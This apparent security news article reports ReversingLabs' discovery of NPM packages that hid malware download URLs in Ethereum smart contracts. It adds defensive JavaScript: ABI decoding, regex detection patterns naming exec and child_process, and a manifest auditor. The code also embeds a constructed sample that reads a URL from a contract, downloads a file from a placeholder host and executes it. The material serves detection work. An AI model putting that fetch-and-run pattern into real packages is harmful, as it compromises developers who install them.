Hackers Hide Malware in Ethereum Smart Contracts via Malicious NPM Packages

Researchers found NPM packages that used Ethereum smart contracts to hide malware download links, revealing a stealthy supply-chain risk for crypto developers.

Researchers at ReversingLabs this week uncovered a new supply-chain technique: two malicious NPM packages that used Ethereum smart contracts to hide instructions pointing infected systems to download further malware.

The packages, colortoolsv2 and mimelib2, were uploaded to the NPM registry in July and at first glance looked like small utilities. Once installed, their code queried the Ethereum blockchain to read URLs stored in a smart contract; those URLs pointed the compromised host at a second-stage malware payload.

Storing the download location in a smart contract rather than in the package itself means a static scan of the package finds no hard-coded URL to flag, and the runtime lookup is a query to an Ethereum node that blends in with legitimate blockchain traffic. Conventional scanners tuned to spot requests to cloud storage or gist links have nothing to match against.
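To make the mechanism concrete, here is an added example (not code from the packages described or from ReversingLabs). It shows how a URL fits inside the ABI-encoded string a Solidity view function returns to an `eth_call`, a constructed snippet in the shape a scanner would need to catch (all identifiers such as CONTRACT, SELECTOR, RPC_URL, STAGE2_PATH and the example.invalid URL are placeholders), and a heuristic scan that flags source combining a chain read, hex decoding and a download or execution step.

```javascript
// Added example: ABI string round-trip plus a triage heuristic for package source.
// Not the malware's code; sample inputs are constructed for illustration.

// ABI encoding of a single `string` return value, as returned by eth_call:
// a 32-byte offset word, a 32-byte length word, then UTF-8 bytes right-padded
// to a 32-byte boundary.
function encodeAbiString(s) {
  const bytes = Buffer.from(s, 'utf8');
  const word = (n) => n.toString(16).padStart(64, '0');
  const paddedLen = Math.ceil(bytes.length / 32) * 64; // in hex characters
  return '0x' + word(32) + word(bytes.length) + bytes.toString('hex').padEnd(paddedLen, '0');
}

function decodeAbiString(hex) {
  const h = hex.startsWith('0x') ? hex.slice(2) : hex;
  if (h.length < 128) throw new Error('too short for an ABI-encoded string');
  const offset = parseInt(h.slice(0, 64), 16) * 2;               // bytes -> hex chars
  const length = parseInt(h.slice(offset, offset + 64), 16) * 2;
  return Buffer.from(h.slice(offset + 64, offset + 64 + length), 'hex').toString('utf8');
}

// Constructed source in the shape the report describes: read a string from a
// contract, decode it, download from it, run what was downloaded. Placeholders
// (CONTRACT, SELECTOR, RPC_URL, STAGE2_PATH, postJson) are hypothetical.
const SUSPICIOUS_SAMPLE = `
const https = require('https');
const fs = require('fs');
const { execFile } = require('child_process');
const rpc = JSON.stringify({ jsonrpc: '2.0', id: 1, method: 'eth_call',
  params: [{ to: CONTRACT, data: SELECTOR }, 'latest'] });
postJson(RPC_URL, rpc, (reply) => {
  // skip "0x" + offset word + length word (130 chars), strip zero padding
  const url = Buffer.from(reply.result.slice(130), 'hex').toString('utf8').replace(/\\0+$/, '');
  https.get(url, (res) => {
    const out = fs.createWriteStream(STAGE2_PATH);
    res.pipe(out).on('finish', () => execFile(STAGE2_PATH));
  });
});
`;

// Constructed benign utility with none of the signals.
const BENIGN_SAMPLE = `
function hexToRgb(hex) {
  const n = parseInt(hex.replace('#', ''), 16);
  return { r: (n >> 16) & 255, g: (n >> 8) & 255, b: n & 255 };
}
module.exports = { hexToRgb };
`;

// Each signal is common on its own in legitimate code; the combination is
// what earns a manual look. Order here is the order hits are reported in.
const INDICATORS = [
  { id: 'chain-query',   re: /\beth_(call|getStorageAt|getLogs)\b|\brequire\(['"](web3|ethers)['"]\)/ },
  { id: 'hex-decode',    re: /Buffer\.from\([\s\S]{0,120}?['"]hex['"]\s*\)|\.toString\(\s*['"](utf-?8|ascii|latin1)['"]\s*\)/ },
  { id: 'network-fetch', re: /\bhttps?\.(get|request)\s*\(|\bfetch\s*\(|\baxios\b/ },
  { id: 'code-exec',     re: /\bchild_process\b|\b(execFile|execSync|spawn|exec)\s*\(|\beval\s*\(|new\s+Function\s*\(/ },
  { id: 'write-to-disk', re: /\bwriteFileSync?\s*\(|\bcreateWriteStream\s*\(/ },
];

function scanSource(src) {
  const hits = INDICATORS.filter((i) => i.re.test(src)).map((i) => i.id);
  const has = (id) => hits.includes(id);
  // read chain state -> decode -> fetch or run: the pattern from the report
  const flagged = has('chain-query') && has('hex-decode') && (has('network-fetch') || has('code-exec'));
  return { hits, flagged };
}

const hiddenUrl = 'https://example.invalid/stage2';       // placeholder, not a real host
console.log(decodeAbiString(encodeAbiString(hiddenUrl))); // the URL survives the round-trip
console.log(scanSource(SUSPICIOUS_SAMPLE));               // flagged: true
console.log(scanSource(BENIGN_SAMPLE));                   // flagged: false
```

The heuristic is a triage aid, not a verdict: a legitimate wallet library also issues `eth_call` and decodes hex, so a hit means a human reads the package, in particular its install-time scripts, before it is allowed into a build.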

ReversingLabs tied the malicious packages to fake GitHub repositories posing as cryptocurrency trading bots. Those repos included fabricated commits, bogus accounts and inflated star counts to appear legitimate, increasing the chance that developers would install compromised code.

Using Ethereum smart contracts for this purpose is novel but builds on older tactics that used trusted hosting services like GitHub Gists, Google Drive or OneDrive to store malicious links. Here the blockchain becomes a covert communication channel.

Developers and security teams should treat this as a wake-up call: commit histories, star counts and maintainer activity can all be faked. Best practices include reviewing a package's source before installing it, pinning dependency versions and using lockfiles, running automated supply-chain scanners, verifying that repository contributors are real and running untrusted packages only in isolated build environments.
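The parts of that checklist a script can enforce before `npm install` runs, as an added example (not tooling from ReversingLabs or from the page's subjects): an audit of a package.json for install-time lifecycle hooks, dependency specs that are not pinned to an exact version, dependencies pulled from git or URLs instead of the registry, and a missing lockfile. The sample manifest and its package names are constructed.

```javascript
// Added example: pre-install audit of a package manifest. Sample data is constructed.

// Exact versions only ("1.2.3", "1.2.3-rc.1"); ranges, tags and URLs fail.
const EXACT_VERSION = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$/;
// npm runs these automatically during install unless --ignore-scripts is set.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'preprepare', 'prepare', 'postprepare'];
const NON_REGISTRY = /^(git\+|git:|https?:|github:|file:)/;

function isPinned(spec) {
  return EXACT_VERSION.test(spec);
}

function auditManifest(manifestJson, { hasLockfile }) {
  const m = JSON.parse(manifestJson);
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (m.scripts && m.scripts[hook]) {
      findings.push({ kind: 'install-hook', detail: `${hook}: ${m.scripts[hook]}` });
    }
  }
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [name, spec] of Object.entries(m[field] || {})) {
      if (NON_REGISTRY.test(spec)) {
        findings.push({ kind: 'non-registry-source', detail: `${name}: ${spec}` });
      } else if (!isPinned(spec)) {
        findings.push({ kind: 'unpinned', detail: `${name}: ${spec}` });
      }
    }
  }
  if (!hasLockfile) {
    findings.push({ kind: 'no-lockfile', detail: 'no package-lock.json; resolved versions are not reproducible' });
  }
  return findings;
}

// Constructed manifest; package names are hypothetical.
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'trading-bot-demo',
  version: '0.1.0',
  scripts: { postinstall: 'node setup.js', test: 'node test.js' },
  dependencies: { 'pkg-a': '1.3.0', 'pkg-b': '^2.0.0', 'pkg-c': 'github:example/pkg-c' },
});

for (const f of auditManifest(SAMPLE_MANIFEST, { hasLockfile: false })) {
  console.log(`${f.kind}: ${f.detail}`);
}
```

Run this against a candidate dependency before it reaches a build; anything under `install-hook` is code that executes on `npm install`, so install in a throwaway container with `npm ci --ignore-scripts` and read the hook script first. Pinning and a lockfile make the resolved tree reproducible, but they do not vouch for what a pinned version contains, which is why source review stays on the list.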

The episode underscores accelerating threats to open-source crypto tooling and highlights how attackers adapt to blend into blockchain ecosystems. That raises particular risk for crypto projects and developers who rely on third-party packages for wallet tools, trading bots or infrastructure.

Source: ReversingLabs. Read the original coverage for full details.
